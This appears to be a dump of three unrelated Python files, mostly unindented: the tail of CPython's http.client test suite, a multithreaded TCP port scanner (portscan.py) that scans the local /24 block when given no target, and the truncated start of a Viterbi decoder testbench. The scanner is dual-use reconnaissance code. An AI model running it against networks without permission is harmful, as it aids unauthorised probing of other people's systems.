lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
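    # lines_expected is inherited from ExtendedReadTest: the de-chunked payload
    # is byte-for-byte identical to the plain-body variant above.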
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
                    idx = limit - datalen - 1
                    break
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
denylist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in denylist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
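# FakeSocketHTTPConnection is presumably defined earlier in this file; it counts
# how many times connect() ran (conn.connections), which is what the reuse /
# reconnect assertions below rely on.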
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
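    # Re-parse whatever request() wrote to the fake socket so each test can
    # inspect the generated headers and body.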
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("body")
with open(os_helper.TESTFN, encoding="utf-8") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(os_helper.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
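    # Stand-in for the connection factory: instead of opening a real socket it
    # returns a FakeSocket preloaded with the canned proxy/target responses and
    # recording the address it was "connected" to.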
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_tunnel_connect_single_send_connection_setup(self):
"""Regresstion test for https://bugs.python.org/issue43332."""
with mock.patch.object(self.conn, 'send') as mock_send:
self.conn.set_tunnel('destination.com')
self.conn.connect()
self.conn.request('GET', '/')
mock_send.assert_called()
# Likely 2, but this test only cares about the first.
self.assertGreater(
len(mock_send.mock_calls), 1,
msg=f'unexpected number of send calls: {mock_send.mock_calls}')
proxy_setup_data_sent = mock_send.mock_calls[0][1][0]
self.assertIn(b'CONNECT destination.com', proxy_setup_data_sent)
self.assertTrue(
proxy_setup_data_sent.endswith(b'\r\n\r\n'),
msg=f'unexpected proxy data sent {proxy_setup_data_sent!r}')
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
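# Illustrative only (not exercised by the tests above): how set_tunnel() is
# typically used against a real forward proxy. The proxy/target hosts are
# placeholders, and 3128 is only an assumed proxy port.
def _tunnel_usage_sketch():
    import http.client
    conn = http.client.HTTPSConnection("proxy.example.com", 3128)
    conn.set_tunnel("www.example.com", 443,
                    headers={"User-Agent": "Mozilla/5.0 (compatible, MSIE 11)"})
    conn.request("GET", "/")
    response = conn.getresponse()
    print(response.status, response.reason)
    conn.close()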
|
portscan.py
|
#!/usr/local/opt/python/bin/python3.7
import socket
import threading
import argparse
import re
import os
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
import resource
# Allow a larger worker-thread count by raising the open-file (FD) limit.
# It stays at 2048 because of macOS's undocumented open-file ceiling.
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, 2048))
# A multithreading portscan module
class PortScan:
# Regex Strings for parsing
SINGLE_IP = r'^(?:\d{1,3}\.){3}\d{1,3}$'
BLOCK_24 = r'^(?:\d{1,3}\.){3}0\/24$'
GROUPED_IP = r'^\[.*\]$'
    def __init__(self, ip_str, port_str=None, thread_num=500,
                 show_refused=False, wait_time=3):
self.ip_range = self.read_ip(ip_str)
if port_str is None:
self.ports = [22, 23, 80]
else:
self.ports = self.read_port(port_str)
self.lock = threading.RLock()
self.thread_num = thread_num
if self.thread_num > 2047:
self.thread_num = 2047
self.q = Queue(maxsize=self.thread_num*5)
self.gen = None # Generator instance to be instantiated later
self.show_refused = show_refused
self.wait_time = wait_time
self.queue_status = False
# Read in IP Address from string.
def read_ip(self, ip_str):
# Single IP address
if re.match(PortScan.SINGLE_IP, ip_str):
if all([x<256 for x in map(int, ip_str.split('.'))]):
return [ip_str]
raise ValueError('incorrect IP Address')
# Block 24 IP address.
if re.match(PortScan.BLOCK_24, ip_str):
block_3 = list(map(int, ip_str.split('.')[:3]))
if all([x<256 for x in block_3]):
block_3s = '.'.join(map(str, block_3))
return [block_3s+'.'+str(i) for i in range(256)]
raise ValueError('incorrect IP Address')
        # List of IP addresses, e.g. "[10.0.0.1, 10.0.0.0/24]"
if re.match(PortScan.GROUPED_IP, ip_str):
ip_str = ip_str[1:-1]
elements = [e.strip() for e in ip_str.split(',')]
master = []
for each in elements:
try:
sub_list = self.read_ip(each)
master.extend(sub_list)
except ValueError as e:
print("{} is not correctly formatted".format(each))
return master
raise ValueError('incorrect Match')
# Read in port range from string delimited by ','
def read_port(self, port_str):
ports = port_str.split(',')
port_list = []
for port in ports:
            if re.match(r'^\d+$', port):
                port_list.append(int(port))
            elif re.match(r'^\d+-\d+$', port):
p_start = int(port.split('-')[0])
p_end = int(port.split('-')[1])
p_range = list(range(p_start, p_end+1))
port_list.extend(p_range)
else:
raise ValueError('incorrect Match')
return port_list
# Standalone thread for queue
def fill_queue(self):
while True:
if not self.q.full():
try:
self.q.put(next(self.gen))
except StopIteration:
# Break condition
self.queue_status = True
# print("STOPITERATION") # DEBUG: STOPITERATION should always appear.
break
else:
time.sleep(0.01)
return
def run(self):
# Generator that contains all ip:port pairs.
self.gen = ((ip, port) for ip in self.ip_range for port in self.ports)
queue_thread = threading.Thread(target=self.fill_queue)
queue_thread.daemon = True
queue_thread.start()
for i in range(self.thread_num):
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
        while not self.queue_status:
            # Wait until the filler thread has exhausted the generator
            # (StopIteration raised) before joining the queue.
            time.sleep(0.1)
self.q.join()
def worker(self):
        # Worker thread: take (ip, port) pairs off the queue and scan them.
while True: # never stop working!
work = self.q.get()
self.ping_port(*work)
self.q.task_done()
def ping_port(self, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.wait_time)
status = sock.connect_ex((ip, port))
if status == 0:
with self.lock:
print('{}:{} OPEN'.format(ip, port))
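        # 35, 64 and 65 are the BSD/macOS errno values for EAGAIN, EHOSTDOWN
        # and EHOSTUNREACH; anything else (typically ECONNREFUSED) is reported
        # only when --show_refused is passed.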
elif status not in [35, 64, 65] and self.show_refused:
with self.lock:
print('{}:{} ERRNO {}, {}'.format(ip, port, status, os.strerror(status)))
return
def get_local_ip():
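    # Discover the default outbound interface's IP by "connecting" a UDP
    # socket to an arbitrary address: no packet is sent, but getsockname()
    # then reports the source address the OS would use.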
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
    except OSError:
IP = '127.0.0.1'
finally:
s.close()
return IP
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip', nargs='?', default=None)
parser.add_argument('-p', '--port', action='store', dest='port')
parser.add_argument('-t', '--threadnum', action='store', dest='threadnum', default=500, type=int)
parser.add_argument('-e', '--show_refused', action='store_true', dest='show_refused', default=False)
parser.add_argument('-w', '--wait', action='store', dest='wait_time', default=5, type=float)
args = parser.parse_args()
if args.ip is None:
print("No IP string found, using local address")
ip = get_local_ip()
print("Local IP found to be {}, scanning entire block".format(ip))
ipblocks = ip.split('.')
ipblocks[-1] = '0/24'
ipfinal = '.'.join(ipblocks)
args.ip = ipfinal
scanner = PortScan(ip_str=args.ip, port_str=args.port,
thread_num=args.threadnum, show_refused=args.show_refused,
wait_time=args.wait_time)
scanner.run()
if __name__ == '__main__':
main()
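# Illustrative usage (addresses below are placeholders):
#   python3 portscan.py 192.168.1.0/24 -p 22,80,443 -t 200 -w 1 -e
# or, from Python:
def _example_scan():
    scanner = PortScan('192.168.1.10', port_str='22,80,8000-8100',
                       thread_num=100, show_refused=True, wait_time=1)
    scanner.run()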
|
viterbi_cxxrtl_tb.py
|
import subprocess
from threading import Thread
import numpy as np
def viterbi_cxxrtl_tb(coded_sequence, cxxrtl_tb_filename):
"""Python interface to cxxrtl executable
coded_sequence
Input data
cxxrtl_tb_filename
Executable name
"""
coded_string = "".join([chr(c + 97) for c in coded_sequence])
cxxrtl_bytes = bytearray(coded_string + ".", "ascii")
decoded = []
def decode_output(out, decoded):
for line in iter(out.readline, b""):
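            # The executable prints ASCII '0' (48) and '1' (49); map them to
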